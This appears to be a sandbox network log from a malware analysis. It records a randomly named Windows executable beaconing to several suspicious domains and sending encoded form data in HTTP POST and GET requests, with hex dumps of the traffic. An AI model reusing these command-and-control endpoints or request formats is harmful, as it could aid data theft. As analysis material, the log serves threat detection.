Nov 5, 2024 07:12:57.108680964 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 05 Nov 2024 06:12:56 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66aa3a46-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 5, 2024 07:12:57.108838081 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 05 Nov 2024 06:12:56 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66aa3a46-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50022	206.119.82.172	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:12:58.113195896 CET	10801	OUT	POST /a3g3/ HTTP/1.1 Host: www.wddb97.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 10302 Content-Type: application/x-www-form-urlencoded Origin: http://www.wddb97.top Referer: http://www.wddb97.top/a3g3/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 39 45 62 79 4e 72 61 76 48 66 56 4f 4a 77 67 66 4e 6b 4f 33 6a 6a 74 65 57 33 73 4f 68 2f 72 4f 6f 4e 36 44 5a 6a 59 77 67 4d 76 68 59 39 36 32 76 67 6e 65 6b 75 41 76 43 62 39 77 47 7a 32 68 78 61 33 34 37 6a 32 41 55 33 34 46 42 45 52 6f 64 6c 31 6d 45 6b 55 6a 32 58 31 31 41 4b 50 6e 47 6b 47 61 4c 4f 36 5a 53 58 79 46 35 4f 55 34 6b 37 6d 46 45 59 56 6a 64 51 4b 33 5a 70 36 33 55 39 4d 63 33 37 58 7a 64 59 6f 41 34 72 52 6d 45 6e 68 30 65 76 77 36 31 54 50 70 53 7a 77 4e 52 56 30 30 30 66 56 55 64 6a 5a 4f 39 47 6e 71 32 5a 43 31 47 66 2f 2f 62 72 4b 30 31 62 4a 43 35 37 49 52 59 6b 48 6a 51 73 67 70 52 76 68 49 69 46 59 6c 62 4b 66 63 50 61 74 76 6c 32 75 4a 51 4c 41 6e 79 31 6c 47 66 70 71 2b 42 54 79 2b 51 5a 52 38 50 6e 49 54 75 35 71 70 65 4e 70 6d 50 38 32 30 55 31 51 54 42 65 33 7a 54 34 4e 6b 36 53 38 6b 51 71 68 49 59 42 4a 34 46 38 33 30 4b 55 52 56 36 63 67 6d 57 66 43 4c 54 4b 75 74 78 36 37 4c 59 4d 45 62 33 50 78 35 67 50 4f 72 41 78 41 2b 63 37 34 73 2b 48 76 39 [TRUNCATED] Data Ascii: FLL4t=9EbyNravHfVOJwgfNkO3jjteW3sOh/rOoN6DZjYwgMvhY962vgnekuAvCb9wGz2hxa347j2AU34FBERodl1mEkUj2X11AKPnGkGaLO6ZSXyF5OU4k7mFEYVjdQK3Zp63U9Mc37XzdYoA4rRmEnh0evw61TPpSzwNRV000fVUdjZO9Gnq2ZC1Gf//brK01bJC57IRYkHjQsgpRvhIiFYlbKfcPatvl2uJQLAny1lGfpq+BTy+QZR8PnITu5qpeNpmP820U1QTBe3zT4Nk6S8kQqhIYBJ4F830KURV6cgmWfCLTKutx67LYMEb3Px5gPOrAxA+c74s+Hv9CXWXIptHT8rC9/uKNizSwry9XN3euX3xWgRQtoIO+R9FrddgSRzDvkUiyNkiQR+3zOm+ZMbNJqdKPsyLijlwPyTqmPWjv2ycU67X8WY3+oCN80WMD3pMLWjO4RJOOHg2MT5zcIJjH8JhgYoS5ePp6CClQZIE+mXd94OG5TibHGozJALUdNBHEYNCffzNdSBk652y1loLCMfE1pDgK7OIsf2mKsSpZL6QDm5UdpBg8NlCiomuv43OqBywyFRnedgtJKbAy0bgUvJB3C74qYR1N2wc1Op1pLPI8I0fHdtTYmkJ3etpS+gOyfIuIIExJhj2oOBR5RpjS/JJOYbBY2BVt8m+uDr29Oqi2jLi+r35HN5PPwxnZX0mx2oRsSweYya1V2K4sCt5WUBD8te9sF1qu+QRr37XZP7kwBR1xKAF4c9UoAl0FeLfGyPA08i9ftgyd9kK6myL5pFFK34Tp++PmTpz7fjCZs/YAXI641a0Co73CS9Gmz2VwkqRvSMily6oe53MPX7oAwEiG4KwbjtpAXMNwZLoMN21xX5eKMPLPYSw4/XVySKUfiHPMNccA0mGCvVOilcEVjHFz/6vCW02dYWm1F+y6eiDxVImjz2VefY082hIGN+8oQLNS4bFdwhSB7DEnkmbYpRrd3dTruK3JVc4+0uwl/zKGh [TRUNCATED]
Nov 5, 2024 07:12:59.086447954 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 05 Nov 2024 06:12:58 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66aa3a46-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50023	206.119.82.172	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:13:00.660121918 CET	443	OUT	GET /a3g3/?FLL4t=wGzSOeLMOeJZKE1qNEa+jhNIWFM/28bU2ce+YDYhk9OHSMfA8Wvg3+EpArxXMTGJwIf87CGML3FOIiYWeXpTMV044XgXGpvZX0LmL4PHT1yh05kop8D3Fas=&ezK=xFOxVPb0UzRXXPy HTTP/1.1 Host: www.wddb97.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Nov 5, 2024 07:13:01.603915930 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 05 Nov 2024 06:13:01 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66aa3a46-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50024	103.191.208.137	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:13:15.679636955 CET	726	OUT	POST /3m9t/ HTTP/1.1 Host: www.roopiedutech.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 202 Content-Type: application/x-www-form-urlencoded Origin: http://www.roopiedutech.online Referer: http://www.roopiedutech.online/3m9t/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 68 67 6d 6d 67 4a 31 32 64 65 68 31 56 47 69 55 6d 4e 67 34 4e 4b 52 33 47 52 58 6c 36 68 35 56 61 71 53 65 37 78 55 6c 6b 75 45 49 2b 77 68 71 71 32 69 77 6f 43 72 34 66 57 32 30 50 34 4f 6a 32 37 39 79 33 41 6a 50 32 73 49 6d 70 58 36 67 45 56 49 69 39 7a 66 38 58 63 54 74 42 76 6f 49 43 56 52 63 4f 6a 64 50 32 68 30 35 6e 73 42 30 30 77 32 70 74 42 6d 7a 7a 31 39 33 4b 50 71 33 43 57 63 4a 78 54 76 75 76 6f 49 67 41 34 6b 6e 78 51 37 57 64 4c 38 7a 6d 78 2f 61 50 64 66 62 67 71 33 54 49 73 41 51 2b 41 5a 56 61 54 51 73 37 64 4f 4b 4f 7a 4d 44 6f 35 42 4e 4c 4e 50 51 43 67 3d 3d Data Ascii: FLL4t=hgmmgJ12deh1VGiUmNg4NKR3GRXl6h5VaqSe7xUlkuEI+whqq2iwoCr4fW20P4Oj279y3AjP2sImpX6gEVIi9zf8XcTtBvoICVRcOjdP2h05nsB00w2ptBmzz193KPq3CWcJxTvuvoIgA4knxQ7WdL8zmx/aPdfbgq3TIsAQ+AZVaTQs7dOKOzMDo5BNLNPQCg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50025	103.191.208.137	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:13:18.223305941 CET	746	OUT	POST /3m9t/ HTTP/1.1 Host: www.roopiedutech.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 222 Content-Type: application/x-www-form-urlencoded Origin: http://www.roopiedutech.online Referer: http://www.roopiedutech.online/3m9t/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 68 67 6d 6d 67 4a 31 32 64 65 68 31 61 48 53 55 70 4b 4d 34 50 71 52 34 44 52 58 6c 6f 68 35 5a 61 71 65 65 37 77 42 2b 6b 63 51 49 2b 52 52 71 72 7a 43 77 72 43 72 34 51 32 32 39 46 59 4f 6b 32 37 68 55 33 46 6a 50 32 73 4d 6d 70 53 57 67 45 6d 67 6c 79 44 66 45 59 38 54 6a 46 76 6f 49 43 56 52 63 4f 6c 78 70 32 6e 63 35 6b 66 5a 30 79 52 32 71 67 68 6d 30 69 31 39 33 42 76 72 2b 43 57 64 63 78 53 44 45 76 71 41 67 41 35 55 6e 78 42 37 5a 47 37 38 78 69 78 2f 4b 4a 65 36 69 2f 4c 47 4d 41 36 55 38 2f 42 64 61 62 56 64 32 71 73 76 64 63 7a 6f 77 31 2b 49 35 47 4f 79 5a 5a 72 53 31 61 35 4a 69 58 4f 6c 2b 47 4d 51 71 34 6c 66 69 57 2b 41 3d Data Ascii: FLL4t=hgmmgJ12deh1aHSUpKM4PqR4DRXloh5Zaqee7wB+kcQI+RRqrzCwrCr4Q229FYOk27hU3FjP2sMmpSWgEmglyDfEY8TjFvoICVRcOlxp2nc5kfZ0yR2qghm0i193Bvr+CWdcxSDEvqAgA5UnxB7ZG78xix/KJe6i/LGMA6U8/BdabVd2qsvdczow1+I5GOyZZrS1a5JiXOl+GMQq4lfiW+A=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50026	103.191.208.137	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:13:20.775448084 CET	10828	OUT	POST /3m9t/ HTTP/1.1 Host: www.roopiedutech.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 10302 Content-Type: application/x-www-form-urlencoded Origin: http://www.roopiedutech.online Referer: http://www.roopiedutech.online/3m9t/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 68 67 6d 6d 67 4a 31 32 64 65 68 31 61 48 53 55 70 4b 4d 34 50 71 52 34 44 52 58 6c 6f 68 35 5a 61 71 65 65 37 77 42 2b 6b 64 6f 49 2b 44 4a 71 71 53 43 77 71 43 72 34 4f 47 32 34 46 59 4f 35 32 37 70 51 33 46 6e 78 32 75 45 6d 37 45 43 67 43 58 67 6c 6c 54 66 45 54 63 54 75 42 76 6f 5a 43 52 4e 48 4f 6a 52 70 32 6e 63 35 6b 5a 64 30 31 41 32 71 7a 52 6d 7a 7a 31 39 46 4b 50 72 57 43 57 46 4d 78 53 33 2b 76 65 4d 67 41 61 38 6e 33 7a 54 5a 62 4c 38 33 75 52 2b 56 4a 65 47 44 2f 50 65 41 41 36 49 53 2f 42 70 61 5a 30 38 64 31 50 33 55 42 42 38 65 72 66 55 54 4b 73 57 6c 66 71 48 42 65 4a 30 39 41 4e 74 6f 4a 73 74 45 39 6d 4c 6d 49 49 6f 6a 58 43 62 74 31 78 37 33 52 6f 2b 6d 4d 36 73 5a 66 65 4c 44 59 73 2f 74 62 2f 63 53 57 32 37 44 58 49 57 74 75 34 36 4c 53 6d 53 64 50 36 67 4d 72 2b 4a 5a 5a 57 43 64 71 36 66 75 43 6c 6d 42 67 74 6f 61 6c 6b 48 30 58 6a 4f 7a 42 4b 4b 77 51 2f 54 4f 54 57 43 34 70 69 49 47 4c 31 65 7a 6d 74 4f 65 72 6c 66 58 73 4b 49 48 59 31 32 65 47 33 4c 62 [TRUNCATED] Data Ascii: FLL4t=hgmmgJ12deh1aHSUpKM4PqR4DRXloh5Zaqee7wB+kdoI+DJqqSCwqCr4OG24FYO527pQ3Fnx2uEm7ECgCXgllTfETcTuBvoZCRNHOjRp2nc5kZd01A2qzRmzz19FKPrWCWFMxS3+veMgAa8n3zTZbL83uR+VJeGD/PeAA6IS/BpaZ08d1P3UBB8erfUTKsWlfqHBeJ09ANtoJstE9mLmIIojXCbt1x73Ro+mM6sZfeLDYs/tb/cSW27DXIWtu46LSmSdP6gMr+JZZWCdq6fuClmBgtoalkH0XjOzBKKwQ/TOTWC4piIGL1ezmtOerlfXsKIHY12eG3Lb/UJ8rZIw6qNmt0+lsoiR65GqLHLSWapbeVG4ZRVrcIwkDkpTBoz6ymnVs5baXNHUtV71NIHJ9oYjOiyMFAmZnFZmirfUmykZGFQBeQc4MJXpHzqjRSTwuA0k40ua9NK2wbcwypTxr8jk4iLrG2pR5zp0dUo4M5smEV2ptRjbAk1G2pjWvxzh6eT7qt2+iYQCqFyAv1HtWYL/nZsq6UMwFBH/3EAOjqqJtNt6Ahx2hYIxHElXGyMo8glgkhLc9mRMbqV5bII74h68QAapxelKJCojnqkDNhmqs2ziTp6GUryJo/b+/adk3AyYiI7xEt27Mwog6n0vLrqdmInxRNxIJQ+LfB1dTbKQ9anF87Z4MZuNt6r0y7vBX4Qil3f8pcSow397HpZ0cZVGvr4FzvwBiB3LWnZbzcLY7R0zbkn7G0lVNE9Hc3kKo058m9DYsM36g83mTtYhcTx4voVXT+M3qb/yuBzn7mzf/w7J8+OvxYTX9qV335rzspM85xn0Fb8iQeGJrJspeoyuJBx+Oxv3dvKSc1qfWG0lPQKLzJuuC3TQGoWZ05TEmu7IYTKfyc7/KMjOYZ6/6YzZiPJkSk8EVtvXq3kIBdteVE5tsGtNNDcOMTUbGX/Zi5Ur/+PmiioIiqAQ8zlxYJ1TRWWK7h6241WcQ+ZiLkMBG2 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50027	103.191.208.137	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:13:23.311908960 CET	452	OUT	GET /3m9t/?FLL4t=siOGj5B0XutXYSucsd0fIKR0LQH5vUluc52n7Rs3scAygCFhnhDrxADoQHiHBruo5ppO8xHCx+tj/iffFnkB/SDXcvjAJfIbSWg6DSwwu1sipuRv+U7XkBw=&ezK=xFOxVPb0UzRXXPy HTTP/1.1 Host: www.roopiedutech.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Nov 5, 2024 07:13:26.220922947 CET	521	IN	HTTP/1.1 301 Moved Permanently Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 x-redirect-by: WordPress location: http://roopiedutech.online/3m9t/?FLL4t=siOGj5B0XutXYSucsd0fIKR0LQH5vUluc52n7Rs3scAygCFhnhDrxADoQHiHBruo5ppO8xHCx+tj/iffFnkB/SDXcvjAJfIbSWg6DSwwu1sipuRv+U7XkBw=&ezK=xFOxVPb0UzRXXPy x-litespeed-cache: miss content-length: 0 date: Tue, 05 Nov 2024 06:13:26 GMT server: LiteSpeed vary: User-Agent

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50028	3.111.160.216	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:13:31.798866987 CET	696	OUT	POST /aajw/ HTTP/1.1 Host: www.comvq.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 202 Content-Type: application/x-www-form-urlencoded Origin: http://www.comvq.fun Referer: http://www.comvq.fun/aajw/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 6f 4c 57 4b 53 4a 6e 51 54 52 46 30 55 4a 63 6c 63 78 7a 62 47 71 33 46 56 5a 43 42 71 67 6e 53 6e 77 4a 47 63 56 50 57 4e 36 53 4d 5a 4e 4a 49 47 41 47 4b 73 79 65 78 42 4f 44 69 62 32 5a 76 57 4e 54 33 45 41 6b 6e 61 58 53 30 51 6d 70 58 44 64 33 55 51 38 70 5a 61 4a 44 47 54 53 46 66 51 30 61 37 42 6c 54 41 63 6e 5a 41 51 45 62 33 79 71 41 51 4b 50 43 36 71 67 41 43 67 6c 4c 32 78 6b 6e 58 4e 4a 55 71 31 6b 45 45 2b 52 49 6f 78 2f 6f 39 35 44 59 57 41 50 68 54 46 75 70 59 47 79 43 77 5a 6f 55 68 58 48 7a 34 6d 37 64 78 4d 75 49 66 52 53 61 75 51 68 47 47 6c 46 69 76 70 67 3d 3d Data Ascii: FLL4t=oLWKSJnQTRF0UJclcxzbGq3FVZCBqgnSnwJGcVPWN6SMZNJIGAGKsyexBODib2ZvWNT3EAknaXS0QmpXDd3UQ8pZaJDGTSFfQ0a7BlTAcnZAQEb3yqAQKPC6qgACglL2xknXNJUq1kEE+RIox/o95DYWAPhTFupYGyCwZoUhXHz4m7dxMuIfRSauQhGGlFivpg==
Nov 5, 2024 07:13:32.872278929 CET	335	IN	HTTP/1.1 404 Server: nginx/1.24.0 Date: Tue, 05 Nov 2024 06:13:32 GMT Content-Type: application/json;charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers Data Raw: 34 32 0d 0a 7b 22 63 6f 64 65 22 3a 22 34 30 31 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 50 61 72 61 6d 65 74 65 72 20 74 6f 6b 65 6e 20 69 73 20 6e 75 6c 6c 22 2c 22 73 75 63 63 65 73 73 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 42{"code":"401","message":"Parameter token is null","success":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50029	3.111.160.216	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:13:34.349190950 CET	716	OUT	POST /aajw/ HTTP/1.1 Host: www.comvq.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 222 Content-Type: application/x-www-form-urlencoded Origin: http://www.comvq.fun Referer: http://www.comvq.fun/aajw/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 6f 4c 57 4b 53 4a 6e 51 54 52 46 30 55 70 73 6c 52 79 62 62 52 36 33 47 57 5a 43 42 7a 77 6d 56 6e 77 4e 47 63 55 4b 64 4e 49 47 4d 61 74 5a 49 48 42 47 4b 35 79 65 78 50 75 44 37 44 57 59 43 57 4b 62 4a 45 43 67 6e 61 58 57 30 51 6e 5a 58 44 71 4c 62 52 73 70 62 53 70 44 45 65 79 46 66 51 30 61 37 42 6c 33 71 63 6e 52 41 51 56 4c 33 77 50 67 54 4a 50 43 37 39 51 41 43 74 46 4c 79 78 6b 6e 35 4e 49 49 4d 31 6d 4d 45 2b 55 6b 6f 32 75 6f 38 7a 44 59 51 45 50 68 42 42 39 45 7a 47 54 2f 73 61 71 30 7a 56 33 75 59 6e 39 51 72 64 66 70 49 44 53 2b 64 4e 6d 50 79 6f 47 66 6d 79 68 79 39 36 49 53 49 76 65 34 39 37 33 6d 79 43 4e 4d 55 64 46 6f 3d Data Ascii: FLL4t=oLWKSJnQTRF0UpslRybbR63GWZCBzwmVnwNGcUKdNIGMatZIHBGK5yexPuD7DWYCWKbJECgnaXW0QnZXDqLbRspbSpDEeyFfQ0a7Bl3qcnRAQVL3wPgTJPC79QACtFLyxkn5NIIM1mME+Uko2uo8zDYQEPhBB9EzGT/saq0zV3uYn9QrdfpIDS+dNmPyoGfmyhy96ISIve4973myCNMUdFo=
Nov 5, 2024 07:13:35.409229040 CET	335	IN	HTTP/1.1 404 Server: nginx/1.24.0 Date: Tue, 05 Nov 2024 06:13:35 GMT Content-Type: application/json;charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers Data Raw: 34 32 0d 0a 7b 22 63 6f 64 65 22 3a 22 34 30 31 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 50 61 72 61 6d 65 74 65 72 20 74 6f 6b 65 6e 20 69 73 20 6e 75 6c 6c 22 2c 22 73 75 63 63 65 73 73 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 42{"code":"401","message":"Parameter token is null","success":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50030	3.111.160.216	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:13:36.892261982 CET	10798	OUT	POST /aajw/ HTTP/1.1 Host: www.comvq.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 10302 Content-Type: application/x-www-form-urlencoded Origin: http://www.comvq.fun Referer: http://www.comvq.fun/aajw/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 6f 4c 57 4b 53 4a 6e 51 54 52 46 30 55 70 73 6c 52 79 62 62 52 36 33 47 57 5a 43 42 7a 77 6d 56 6e 77 4e 47 63 55 4b 64 4e 49 65 4d 61 65 68 49 48 69 2b 4b 2f 43 65 78 51 65 44 6d 44 57 59 36 57 4c 2f 56 45 43 74 51 61 56 2b 30 53 46 52 58 49 37 4c 62 62 73 70 62 65 4a 44 42 54 53 46 4f 51 30 4b 2f 42 6c 6e 71 63 6e 52 41 51 57 44 33 30 61 41 54 47 76 43 36 71 67 41 30 67 6c 4c 61 78 6b 75 45 4e 49 4d 36 32 53 41 45 2b 30 30 6f 30 63 41 38 2f 44 59 53 4a 76 67 53 42 39 49 73 47 53 54 67 61 75 38 64 56 31 79 59 6d 72 6b 31 4a 2b 67 55 63 68 71 70 5a 31 37 55 6a 6e 6a 46 38 79 47 55 37 6f 71 45 34 36 6f 58 32 6e 72 5a 66 50 73 73 42 44 72 73 70 44 59 4c 4e 69 4d 47 76 4e 69 6b 37 37 77 6f 4c 64 55 6d 53 6d 62 46 6b 66 37 55 35 31 34 6c 34 35 79 6b 74 6a 57 65 4e 73 78 77 52 46 2b 66 45 71 42 68 32 79 58 70 4a 33 6f 50 4f 43 78 49 66 59 4f 72 32 56 45 76 64 5a 37 32 4a 32 6f 47 69 31 4f 4c 49 46 2f 75 63 41 77 50 77 65 43 41 4c 58 37 6a 53 48 36 43 63 58 48 59 5a 6e 61 7a 45 46 51 78 [TRUNCATED] Data Ascii: 